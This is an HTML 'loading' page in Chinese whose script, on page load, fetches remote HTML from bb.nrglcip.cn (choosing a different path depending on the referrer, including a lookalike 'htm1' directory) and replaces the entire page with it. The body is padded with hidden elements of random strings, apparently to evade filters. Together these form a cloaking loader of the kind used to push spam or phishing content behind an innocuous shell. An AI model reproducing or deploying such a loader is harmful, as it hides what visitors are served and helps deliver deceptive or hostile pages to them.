<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .cqU1o6jdc {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .cqU1o6jdc .OKsTNGzNZE {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .cqU1o6jdc .content {
            line-height: 50px;
            text-align: center
        }

        .cqU1o6jdc .img {
            width: 100%
        }

        .cqU1o6jdc .Lyn6RuWZ {
            text-align: center
        }

        .cqU1o6jdc .Lyn6RuWZ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .cqU1o6jdc .Lyn6RuWZ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .cqU1o6jdc .Lyn6RuWZ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .cqU1o6jdc .Lyn6RuWZ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .cqU1o6jdc .Lyn6RuWZ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .cqU1o6jdc .Lyn6RuWZ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .cqU1o6jdc .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function bi7V7NRA0oC7(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var aRuCJZf = bi7V7NRA0oC7('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ aRuCJZf +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ aRuCJZf +".html?a=share";
		}
		
        hlctzhe=url+"#"+new Date().getTime();
        hlctzhe && function() {
            $.get(hlctzhe, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>QpqGSITbrREoaFKVt647sKX7</p>
<h1 style='display:none' >Gx6DCvk18NM8nuWEnVm5Z8IRkXRCg2fK1SsWZJATNPYNDb648BLLYQBhP99kqhy</h1>
<p  style='display:none'>QpqGSITbrREoaFKVt647sKX7</p>
<li style='display:none' >bHimhVzz3bOP4xu5Mpc1wc9fykUgW28UB1</li>
<b style='display:none' >vU71VkcBdB1xAjYPoWML7NVtFa64JBf2FFuutwhyzzlKXxDfFXANZJhvuUukrkY751dsEaqOQK2TG3Ti4o3mlmF</b><div class="cqU1o6jdc">
    <div class="OKsTNGzNZE">
        <div class="Lyn6RuWZ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >bu4Jx41N6NSpAAsb5hEl0xPsjOuIbHm51rgrsFmB9kKab1forltPPBTrj5KPuHx0qRuMovqxsErwkqZTj1ySbr6DwJKOkCEAW</li>
<li style='display:none' >bu4Jx41N6NSpAAsb5hEl0xPsjOuIbHm51rgrsFmB9kKab1forltPPBTrj5KPuHx0qRuMovqxsErwkqZTj1ySbr6DwJKOkCEAW</li>
<div style='display:none'>a4VRGpGOUsxSvQ8apIMSDPVcysKI</div>
<div style='display:none'>a4VRGpGOUsxSvQ8apIMSDPVcysKI</div>
<span style='display:none'>Xx4ildaufbuUmCSDlaoiqzDntS1D4g1Z3OdnYNVtPWnAMZhT3f8RlnD0y8vPyDKY8A9iNvPiaVp</span>
<ul style='display:none' >u9paRTFrP6H3guwSL0ylzCWXyAQZTCpLBNvEHWYBz2</ul>
<li style='display:none' >bu4Jx41N6NSpAAsb5hEl0xPsjOuIbHm51rgrsFmB9kKab1forltPPBTrj5KPuHx0qRuMovqxsErwkqZTj1ySbr6DwJKOkCEAW</li>
<li style='display:none' >bu4Jx41N6NSpAAsb5hEl0xPsjOuIbHm51rgrsFmB9kKab1forltPPBTrj5KPuHx0qRuMovqxsErwkqZTj1ySbr6DwJKOkCEAW</li>
<li style='display:none' >bu4Jx41N6NSpAAsb5hEl0xPsjOuIbHm51rgrsFmB9kKab1forltPPBTrj5KPuHx0qRuMovqxsErwkqZTj1ySbr6DwJKOkCEAW</li></body>
</html>